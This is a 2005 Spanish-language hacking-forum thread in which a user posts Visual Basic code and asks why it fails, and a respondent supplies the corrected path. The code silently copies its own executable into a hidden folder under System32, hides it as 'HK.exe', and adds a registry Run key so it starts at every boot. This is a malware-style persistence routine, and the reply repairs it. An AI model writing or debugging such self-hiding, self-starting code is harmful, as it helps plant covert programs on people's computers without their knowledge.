elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  AYUDAAAAAA!!!! Urgente!!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: AYUDAAAAAA!!!! Urgente!!!  (Leído 1,594 veces)
Nichas

Desconectado Desconectado

Mensajes: 13


Ver Perfil
AYUDAAAAAA!!!! Urgente!!!
« en: 8 Julio 2005, 20:39 pm »

Haber tengo esto y me da un error diciendo File Not Found y Se me pone en amarillo toda esta fila: FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\System32\Private System" & App.EXEName & ".exe"

Ayuda!!! k Estoy k siempre me da algo Raro!!


Private Sub Form_Load()
Set sh = CreateObject("WScript.Shell")
Set ficheros = CreateObject("Scripting.FileSystemObject")
ficheros.CreateFolder "C:\Windows\system32\Private System"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\Private System" & App.EXEName & ".exe"
Call SetAttr("C:\Windows\system32\Private System" & "\HK.EXE", vbHidden)
sh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Private System", "C:\Windows\system32\Private System\HK.exe"
End
End Sub


Hmmmm.... hay que poner algun modulo??? XDDD


« Última modificación: 8 Julio 2005, 20:46 pm por Nichas » En línea

programatrix


Desconectado Desconectado

Mensajes: 3.287


Ver Perfil WWW
Re: AYUDAAAAAA!!!! Urgente!!!
« Respuesta #1 en: 9 Julio 2005, 12:52 pm »

Te da error porque es así:
Código:
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\System32\Private System" & [b]\[/b] & App.EXEName & ".exe"
No así:
Código:
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\System32\Private System" & App.EXEName & ".exe"
Te faltaba \


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayudaaaaaa
Java
supersergio88 1 2,291 Último mensaje 10 Junio 2011, 02:37 am
por barbieturico
ayudaaaaaa en C plssssssss!!!!!!
Programación C/C++
alessinf 2 1,891 Último mensaje 30 Noviembre 2011, 17:34 pm
por alessinf
Programa c++, ayudaaaaaa
Programación C/C++
Soulmaquine 1 1,649 Último mensaje 16 Marzo 2015, 22:15 pm
por NOIS
Ayudaaaaaa
Hardware
Astar21 2 2,251 Último mensaje 28 Diciembre 2015, 23:59 pm
por Astar21
Ayudaaaaaa!
Programación C/C++
9pumba9 3 1,757 Último mensaje 20 Julio 2016, 15:57 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines